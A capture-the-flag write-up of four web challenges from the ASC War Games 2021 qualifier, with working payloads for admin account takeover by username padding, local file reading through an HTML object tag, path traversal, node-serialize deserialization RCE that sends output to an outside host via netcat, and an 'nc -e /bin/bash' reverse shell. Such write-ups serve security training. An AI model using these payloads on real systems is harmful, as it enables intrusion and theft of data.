ASC War Games Filtration Phase 2021

3 years ago 172
BOOK THIS SPACE FOR AD
ARTICLE AD

abda11atarek

Our team got 2nd place in the qualification phase(FireFall)

Hi, I’m abda11atarek, our team got 2nd place in the qualification phase (FireFall) and here is my write-up for web challenges. See you at the finals.

Cyber Space 300 point:

By opening this challenge, you will find that you have a registration page and login page.

At first, I checked if I can do authentication bypass or not.

Unfortunately, I could not.

So, I went to the registration page and then I found that there is a maximum length of the username is 20 characters and from that I took the request to burp and then made the username admin and then added spaces exceeding 20 spaces and made the password admin

Username=admin+++++++++++++++++++++++++++++++++++++++++++++++++&password=admin

Then I went and logged in as the username admin and the password admin.

With this, the challenge was solved and you entered as an admin.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Curriculum Vitae 300 point:

Description: apply for this job

By opening this challenge, you will find a page that takes data from you such as your name, category and a picture of you.

By uploading a picture of you, I thought that I could upload a shell, but I was surprised when I found that it only takes the name of the picture and does not upload the file.

After this, I thought that it might be LFI, but when I could not read anything, and after trying many things, I found that it accepts tags in the name of the picture, so I thought that this image name might accept an object, so I thought to inject a tag called Object This tag takes an attribute called data Now I can send it a file, for example /etc/passwd, but to use it I need the wrapper file:// So the final payload will be like this.

Name=abdalla&category=web&picture_name=<object+data=’file:///etc/passwd’>

Yes, I was able to read the etc/passwd file. After this I read the flag that was in /home/flag.txt.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Translator 2 600 point:

Description: Jett: i’m trying to reach my home Reyna: u told me once that u are from the environment city.

At the beginning of this challenge, I could not find anything except a variable named agent_name. I tried LFI and command injection, but nothing worked.

But fortunately, I found a dir called images, which gives me that message when requested.

“This place is nice, but not nice enough to die in. Let’s win and get outta here!!”

But when we change images to anything else, we will find that it gives the same message.

So, I thought I’d try path traversal and read the /etc/passwd file.

http://35.202.244.143:8082/../../etc/passwd

Now you can read the file. And from the description of the challenge, we should read the environment file.

So, I went to read it.

http://35.202.244.143:8082/../../etc/environment

When you read it, it tells you to go to a java-script file called NoHealForYouToxic.js.

When you visit it, you will find the source code for the site.

After reading the source code, I found that there is this line:

var serialize = require(‘node-serialize’);

Which if you search for it in Google, you will find that it is vulnerable with the rce vulnerability and this is the link to the exploit that I gave:

https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf

from this code

// Decode the base64 and deserialize the objectconst buff = Buffer.from(agent_name, 'base64');const str = buff.toString('utf-8');serialize.unserialize(str);

Decode the base64 and deserialize the object “agent_name”

he didn’t print the unserialize string(blind RCE)

So, this was my payload:

{“rce”:”_$$ND_FUNC$$_function(){\nrequire(‘child_process’).exec(‘ls / | nc your-server-ip port ‘, function(error,stdout, stderr) ) { \n\tconsole.log(stdout) });}()”}

Make base64 encode and put it in agent_name Parameter.

The response:

the response of ls command

The final payload:

{“rce”:”_$$ND_FUNC$$_function(){\nrequire(‘child_process’).exec(‘cat /home/20210730ascwgflag0FUSasnlkdnasd.txt | nc your-server-ip port ‘, function(error,stdout, stderr) { \n\tconsole.log(stdout) });}()”}

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Calc 900 point:

Description: You think you’re smart enough? Check this out: https://pastebin.com/EZkVa5Lj and here is your password: z6QVQfKkKd

By opening this link, we will find that it contains the source code for this site.

At first I opened the challenge and interrupted the request and found this:

POST /api/calc HTTP/1.1
Host: 35.188.75.59:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 117
Origin: http://35.188.75.59:8082
Connection: close
Referer: http://35.188.75.59:8082/
{"job":{"task":"sin","args":[1]}}

This means that he calls the sin function and puts the data in the args.

Let’s go and analyze the source code, we will find that it creates a white list that contains many math functions and they are

[‘doc’, ‘loader’, ‘name’, ‘package’, ‘spec’, ‘acos’, ‘acosh’, ‘asin’, ‘asinh’, ‘atan’, ‘atan2’, ‘atanh’, ‘ceil’, ‘comb’, ‘copysign’, ‘cos’, ‘cosh’, ‘degrees’, ‘dist’, ‘e’, ‘erf’, ‘erfc’, ‘exp’, ‘expm1’, ‘fabs’, ‘factorial’, ‘floor’, ‘fmod’, ‘frexp’, ‘fsum’, ‘gamma’, ‘gcd’, ‘hypot’, ‘inf’, ‘isclose’, ‘isfinite’, ‘isinf’, ‘isnan’, ‘isqrt’, ‘lcm’, ‘ldexp’, ‘lgamma’, ‘log’, ‘log10’, ‘log1p’, ‘log2’, ‘modf’, ‘nan’, ‘nextafter’, ‘perm’, ‘pi’, ‘pow’, ‘prod’, ‘radians’, ‘remainder’, ‘sin’, ‘sinh’, ‘sqrt’, ‘tan’, ‘tanh’, ‘tau’, ‘trunc’, ‘ulp’]

Now the important question is which of these functions can be used to execute Command?

Not one, so we need to use a function that can do that.

So, I tried to use system but it’s not in the white list.

But from the last line

We will find that it is making an update to the list if it was sent with the request.

And here the Scope contains os and math, but now I will use the function system, which is inside the os and not the math.

self.scope = ‘math’

So, I will update the Scope to be os instead of math.

I will modify the request to be like this:

POST /api/calc HTTP/1.1
Host: 35.188.75.59:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 117
Origin: http://35.188.75.59:8082
Connection: close
Referer: http://35.188.75.59:8082/
{"job":{"task":"system","args":["nc -e /bin/bash ip port"], "scope":"os", "whitelist":[ "system" ] }}

The challenge was solved

Thank you for reading //FireFall

Read Entire Article